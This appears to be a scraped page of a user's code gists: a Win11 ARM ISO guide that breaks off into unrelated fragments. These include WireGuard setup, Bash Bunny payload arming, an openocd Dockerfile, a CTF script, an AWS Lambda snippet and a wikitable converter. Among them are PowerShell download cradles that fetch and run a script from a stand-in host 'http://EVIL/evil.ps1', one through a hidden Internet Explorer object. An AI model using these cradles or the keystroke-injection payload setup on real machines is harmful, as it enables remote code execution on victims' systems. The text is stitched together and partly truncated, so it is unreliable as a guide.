Tonimir Kisasondi tkisason

Build a arm Win11 Pro ISO on Linux / MacOS without homebrew or other binaries

This is a short guide on how to build a Win11 Pro ISO image on a linux vm and a macos machine running apple silicon. Such an ISO file can be used to install Win11 Pro on an Apple Silicon (m1 / m2) macbook under vmware. Yes, there are binaries, scripts and tools for this, but this guide only requires some linux tools and a plain macos machine without homebrew and without running some shady binaries downloaded from the Internet.

Download the Win11 product catalog in CAB from from: https://go.microsoft.com/fwlink?linkid=2156292

Unarchive the cab file, extract the products.xml file

On each host, install wireguard:

sudo apt install software-properties-common
sudo add-apt-repository ppa:wireguard/wireguard
sudo apt update
sudo apt install wireguard-dkms wireguard-tools

wg genkey | tee privatekey | wg pubkey &gt; publickey

Custom languages don't work without bbpayloads: Fetch the bashbunny payloads:

git clone https://github.com/hak5/bashbunny-payloads.git

Slide the switch to arming position (all the way to the usb plug)

move contents of payloads/library/DuckyInstall to the payloads/switch1 directory in the bunny

	FROM kalilinux/kali-rolling
	WORKDIR /opt
	RUN apt update && apt install -y git make libtool pkg-config autoconf automake texinfo libusb-dev libftdi-dev libftdi1-dev libcapstone-dev
	RUN git clone https://github.com/stacksmashing/openocd-tamarin
	WORKDIR /opt/openocd-tamarin
	RUN ./bootstrap
	RUN ./configure --enable-ulink=no --enable-usb-blaster-2=no --enable-vsllink=no --enable-cmsis-dap-v2=no --enable-osbdm=no --enable-opendous=no --enable-armjtagew=no --enable-rlink=no --enable-usbprog=no --enable-cmsis-dap=no --enable-nulink=no --enable-kitprog=no --enable-usb-blaster=no --enable-presto=no --enable-buspirate=no --disable-werror
	RUN make

	#!/bin/bash
	set -ex

	apt update
	apt install -y libssl-dev libssl1.1 python3-pip build-essential git \
	pkg-config autoconf autoconf-archive libglib2.0-dev \
	libjsoncpp-dev uuid-dev liblz4-dev libcap-ng-dev \
	libxml2-utils python3-minimal python3-dbus \
	python3-docutils python3-jinja2 libxml2-utils \
	libtinyxml2-dev policykit-1 libsystemd-dev \

	#!/usr/bin/env python3

	import string
	import random
	import os
	import shutil
	import glob

	challengeText = """Here is a carefully prepared file. You must find the flag within!"""

	#!/usr/bin/env python3
	import os
	import sys
	from ruamel.yaml import YAML


	def getRulefilesFromPath(path):
	rulefiles = []
	for root, dirs, files in os.walk(path):
	dirs[:] = [d for d in dirs if not d.startswith(".")]

	import json
	import boto3
	from botocore.exceptions import ClientError
	ec2 = boto3.client('ec2')
	security_group_id = "sg-..." ## add your security group ID here!
	#0. Find your security group name from your EC2 instance and copy/paste your security group id above ^^^

	# Create a new lambda function, name it whatever, runtime: python 3.7
	# Select the Execution role : Create new role with basic Lambda permissions
	# Pick the "Enable Function URL" option from Advanced settings.

	# normal download cradle
	IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

	# PowerShell 3.0+
	IEX (iwr 'http://EVIL/evil.ps1')

	# hidden IE com object
	$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

	# Msxml2.XMLHTTP COM object

	def convert(intext):
	intext = intext.split('\n')
	text = '{\| class="wikitable"' +'\n'
	line = intext[0].replace(' \| ', ' !! ').replace('\| ','! ')
	text += line + '\n'
	intext.pop(0)
	for row in intext:
	text += '\|-' + '\n'
	row = row.replace(' \| ',' \|\| ').replace('**','')
	text += row[:-1] + '\n'